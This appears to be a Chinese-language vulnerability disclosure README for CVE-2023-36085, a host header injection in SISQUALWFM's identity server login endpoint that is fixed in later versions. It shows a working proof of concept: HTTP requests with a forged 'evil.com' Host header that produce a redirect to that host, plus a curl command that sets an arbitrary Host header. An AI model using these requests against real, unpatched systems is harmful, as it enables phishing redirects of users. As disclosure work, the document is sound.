
本仓库包含在 SISQUALWFM 7.1.319.103 版本中发现的主机头注入漏洞的相关信息,该漏洞允许攻击者操纵网页链接或将用户重定向到恶意站点。此漏洞已被分配编号 CVE-2023-36085,并已在 7.1.319.111 及更高版本中修复。
我们提供了一个概念验证场景,演示主机头注入漏洞,特别针对 /sisqualIdentityServer/core 端点。该漏洞允许攻击者通过篡改主机头来操纵网页链接或将用户重定向到另一个站点。
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
...
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
...
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
...
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
...

为了利用此漏洞,攻击者可以使用以下 curl 命令来修改主机头:
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv
本仓库仅供参考,不应被用于任何恶意活动。该漏洞已负责任地向厂商披露,问题已得到解决。在识别和报告漏洞时,遵循道德黑客准则并尊重负责任披露实践至关重要。